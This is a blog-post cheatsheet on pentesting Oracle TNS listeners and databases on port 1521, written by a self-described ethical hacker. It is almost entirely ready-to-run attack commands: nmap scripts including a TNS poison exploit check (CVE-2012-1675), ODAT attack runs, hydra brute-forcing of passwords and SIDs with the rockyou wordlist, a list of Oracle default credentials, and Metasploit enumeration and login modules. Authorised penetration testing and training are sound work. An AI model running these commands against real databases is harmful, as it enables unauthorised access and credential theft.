Pentesting Oracle TNS listener/ Database - Chaeatsheet - Port 1521

August 14, 2023

 


#nmap
nmap -Pn -sV -p1521 --script=oracle* 10.10.10.10

#Check for service Version
#Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5,
#try this exploit 
GitHub - bongbongco/CVE-2012-1675: Oracle Database TNS Listener Poison Attack Vulnerability 
 nmap -Pn -sT --script=+oracle-tns-poison.nse -p 1521 10.10.10.10

Oracle SQL:
1521/TCP
1630/TCP
3938/HTTP

Accessing Oracle DB using SQL Plus

https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip 
sudo mkdir -p /opt/oracle
sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip
sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip
nano ~/.bashrc
export LD_LIBRARY_PATH=/opt/oracle:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
source ~/.bashrc

sqlplus -V
sqlplus username/password@sid
sqlplus username/pass@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=hostname.network)(Port=1521))(CONNECT_DATA=(SID=remote_SID)))


ODAT - Oracle Database Attacking Tool

#Download the release 
https://github.com/quentinhardy/odat/releases/
tar -xvf filename

#Run 
./odat all -s 10.10.10.10
./odat all -s 10.10.10.10 -d SID_NAME
./odat all -s 10.10.10.10 -d ''

#Check with creds
./odat all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password

#bruteforce when you know SID
./odat all -s 10.10.10.10 -d '' --accounts-file accounts/accounts_multiple.txt

#Enum - Doesn't work if password protected 
sudo apt install tnscmd10g

#Version
tnscmd10g version -h 10.10.10.10
#Status
tnscmd10g status -h 10.10.10.10

#Login to DB
sqsh -S IP_Address:PORT -u username -p password

Brute Forcing 
#Passwords
hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 10.10.10.10 oracle-listener
hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 10.10.10.10 oracle

#SID
#Download wordlist from here
hydra -L /usr/share/oscanner/services.txt -s 1521 10.10.10.10 oracle-sid

#Brutefocing Creds - Require SID
./odat passwordguesser -d SID_NAME -s 10.10.10.10 -p 1521 --accounts-file accounts/accounts_multiple.txt

Default Passwords

DBSNMP/DBSNMP — Intelligent Agent uses this to talk to the db server (its some work to change it)
SYS/CHANGE_ON_INSTALL — Default sysdba account before and including Oracle v9, as of version 10g this has to be different!
PCMS_SYS/PCMS_SYS — Default x account
WMSYS/WMSYS — Default x account
OUTLN/OUTLN — Default x account
SCOTT/TIGER — Default x account

Metasploit

use auxiliary/scanner/oracle/sid_enum
use auxiliary/admin/oracle/tnscmd
use auxiliary/admin/oracle/sid_brute 
use auxiliary/admin/oracle/oracle_login
By:
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment